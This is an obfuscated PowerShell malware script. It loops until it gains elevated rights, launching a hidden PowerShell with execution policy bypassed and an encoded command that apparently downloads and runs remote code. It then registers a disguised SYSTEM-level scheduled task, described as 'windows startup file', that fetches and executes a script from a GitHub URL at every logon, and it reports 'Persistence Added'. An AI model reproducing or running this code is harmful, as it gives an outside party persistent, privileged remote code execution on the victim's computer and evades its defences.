function `Szrv9w`T`T`Mfk {param ([string] $kDoThrfletCyaf);${`Kdotic`D`Zkw`O`P`Ir} = [COnverT]::"`Fro`Mb`As`E64`Str`I`Ng"($Kdothrfletcyaf);${k`D`O`T`X`Ctwha`I`C`Qe} = [sysTeM.io.MeMoRyStreaM]::"`New"(${`Kd`Ot`I`Cd`Z`Kwo`Pi`R});${kdot`Bvvk`D`N`Z`P`N`J} = [sySTEm.iO.COMprEsSiOn.gzIpsTreAm]::"new"(${kd`O`T`Xctw`Ha`Icq`E}, [SYSTEM.IO.coMPrEssION.cOMPRessioNMODe]::"d`E`Co`M`Press");${`K`Do`T`B`Vv`K`Dn`Zpnj} = [SYstem.iO.ComprEssIOn.GZIPStrEaM]::"ne`W"([SYStEM.iO.mEMOrYStrEAm]::"`N`E`W"(${kd`O`Ti`Cdz`Kw`Op`Ir}), [systEm.Io.COmpReSSioN.compREsSiONModE]::"`D`E`Co`Mpr`Es`S");${k`Dot`B`E`N`N`Oc`J`Tdi} = [SySTeM.IO.strEaMReAdeR]::"`N`E`W"(${kdo`Tbv`V`Kd`N`Z`Pn`J});${k`D`O`T`Lv`W`Y`Pdioqk} = ${`K`Dot`Be`Nno`Cj`Tdi}."r`Ea`D`Toen`D"();return ${kdotl`Vw`Yp`Dio`Q`K}}
while (([MAth]::E -ne [MATH]::PI)) {
    try {
        .(-join[char[]]((-8317+9496-1096),(2613-2497),(-122+219),(9790-9676),(-8197+9172-859),(9714-9669),(1797+3556-5273),(-10070+9784+400),(-1856+1967),(6729-5237-1393),(8+93),(6430-6315),(-2269+2384))) ((([sYStEM.teXT.ENCODiNg]::"u`Tf8"."`Ge`T`S`Tr`I`N`G"([byte[]](112,111,119,101,114,115,104,101,108,108))))) -ArgumentList ((([sySteM.TEXt.EncOdIng]::"ut`F8"."get`S`Tri`N`G"([byte[]](45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,66,121,112,97,115,115,32,45,101,32,97,81,66,51,65,72,73,65,75,65,65,110,65,71,103,65,100,65,66,48,65,72,65,65,99,119,65,54,65)))+([SyStEM.TexT.ENCoDing]::"`Utf8"."`G`E`T`S`T`Rin`G"([byte[]](67,56,65,76,119,66,106,65,71,56,65,90,65,66,108,65,71,89,65,98,119,66,121,65,71,89,65,100,81,66,117,65,67,52,65,100,103,66,108,65,72,73,65,89,119,66,108,65,71,119,65,76,103,66,104,65,72,65,65,99,65,65,118,65,72,77,65,97,81,66,110,65,71,48,65,89,81,65,110,65,67,107,65,73,65,66)))+([SYSTem.TexT.enCodING]::"`Utf8"."g`E`Tst`R`I`N`G"([byte[]](0x38,0x41,67,0x41,0x41,97,81,0x42,108,0x41,72,103,65))))) -WindowStyle Hidden -PassThru -Verb RunAs
    } catch {
    }
}

$task_name = "simpletask"
$task_action = New-ScheduledTaskAction -Execute "mshta.exe" -Argument "vbscript:createobject(`"wscript.shell`").run(`"powershell `iwr('https://raw.githubusercontent.com/gingogaming-dot/test/refs/heads/main/a')|iex`",0)(window.close)"
$task_trigger = New-ScheduledTaskTrigger -AtLogOn
$task_settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -RunOnlyIfNetworkAvailable -DontStopOnIdleEnd -StartWhenAvailable
Register-ScheduledTask -Action $task_action -Trigger $task_trigger -Settings $task_settings -TaskName $task_name -Description "windows startup file" -RunLevel Highest -User "NT AUTHORITY\SYSTEM" -Force
Write-Host "[!] Persistence Added" -ForegroundColor Green
